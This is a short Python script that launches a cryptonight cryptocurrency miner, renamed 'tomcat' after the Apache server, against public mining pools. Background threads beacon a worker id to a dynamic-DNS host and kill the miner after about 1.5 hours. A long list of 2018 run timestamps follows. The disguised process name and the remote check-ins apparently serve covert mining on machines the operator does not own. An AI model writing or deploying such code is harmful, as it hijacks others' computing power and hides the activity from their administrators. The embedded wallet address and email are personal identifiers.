import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:37:05.517930
#2018-02-17 16:22:05.866507
#2018-02-17 18:11:07.975296
#2018-02-17 19:59:05.733259
#2018-02-17 21:47:06.364119
#2018-02-17 23:33:06.237039
#2018-02-18 01:22:07.772647
#2018-02-18 03:09:01.452129
#2018-02-18 04:58:05.538242
#2018-02-18 06:52:04.218035
#2018-02-18 08:41:07.521392
#2018-02-18 10:27:05.499960
#2018-02-18 12:13:05.388639
#2018-02-18 13:59:01.653724
#2018-02-18 15:49:01.906589
#2018-02-18 17:39:05.653875
#2018-02-18 19:27:03.911443
#2018-02-18 21:12:01.338746
#2018-02-18 22:59:02.393258
#2018-02-19 00:47:04.564104
#2018-02-19 02:34:02.216150
#2018-02-19 04:20:08.351202
#2018-02-19 06:05:05.753191
#2018-02-19 07:53:05.258688
#2018-02-19 09:43:06.054911
#2018-02-19 11:33:07.623336
#2018-02-19 13:20:10.320534
#2018-02-19 15:09:08.340313
#2018-02-19 16:56:07.392933
#2018-02-19 18:43:01.266944
#2018-02-19 20:32:04.938294
#2018-02-19 22:18:08.201145
#2018-02-20 00:03:06.424827
#2018-02-20 01:49:07.847495
#2018-02-20 03:39:05.799594
#2018-02-20 05:25:07.392596
#2018-02-20 07:09:02.204623
#2018-02-20 08:54:08.067587
#2018-02-20 10:38:02.015247
#2018-02-20 12:24:05.326293
#2018-02-20 14:11:08.541173
#2018-02-20 15:55:04.878105
#2018-02-20 17:40:12.657923
#2018-02-20 19:28:08.812418
#2018-02-20 21:16:05.480905
#2018-02-20 23:00:09.110895
#2018-02-21 00:45:04.316472
#2018-02-21 02:30:07.424085
#2018-02-21 04:16:07.780551
#2018-02-21 06:03:05.441988
#2018-02-21 07:49:06.397649
#2018-02-21 09:35:03.195752
#2018-02-21 11:23:08.362903
#2018-02-21 13:13:10.551369
#2018-02-21 14:58:05.923827
#2018-02-21 16:46:08.004366
#2018-02-21 18:35:11.506830
#2018-02-21 20:21:08.624174
#2018-02-21 22:11:02.032910
#2018-02-21 23:59:04.009899
#2018-02-22 01:46:06.670325
#2018-02-22 03:34:04.337420
#2018-02-22 05:20:01.445136
#2018-02-22 07:06:06.857070
#2018-02-22 08:54:06.862226
#2018-02-22 10:42:01.812625
#2018-02-22 12:28:07.927224
#2018-02-22 14:13:08.209746
#2018-02-22 16:01:07.767405
#2018-02-22 17:48:06.900360
#2018-02-22 19:35:06.771610
#2018-02-22 21:27:01.801198
#2018-02-22 23:14:06.784960
#2018-02-23 01:01:08.181222
#2018-02-23 02:49:04.105884
#2018-02-23 04:38:01.782434
#2018-02-23 06:24:07.353337
#2018-02-23 08:10:01.675460
#2018-02-23 10:27:03.516405
#2018-02-23 12:20:10.148136
#2018-02-23 14:09:05.603756
#2018-02-23 15:58:05.589529
#2018-02-23 17:44:07.800393
#2018-02-23 19:32:01.229137
#2018-02-23 21:15:03.920826
#2018-02-23 23:02:04.104263
#2018-02-24 00:48:06.612550
#2018-02-24 02:36:06.264345
#2018-02-24 04:29:06.704805
#2018-02-24 06:14:04.013854
#2018-02-24 08:02:01.503916
#2018-02-24 09:45:08.237131
#2018-02-24 11:40:04.350706
#2018-02-24 13:31:05.801057
#2018-02-24 15:19:03.792675
#2018-02-24 17:08:01.575796
#2018-02-24 19:00:05.845201
#2018-02-24 20:47:07.135929
#2018-02-24 23:03:07.452408
#2018-02-25 03:13:01.936812
#2018-02-25 06:46:01.243405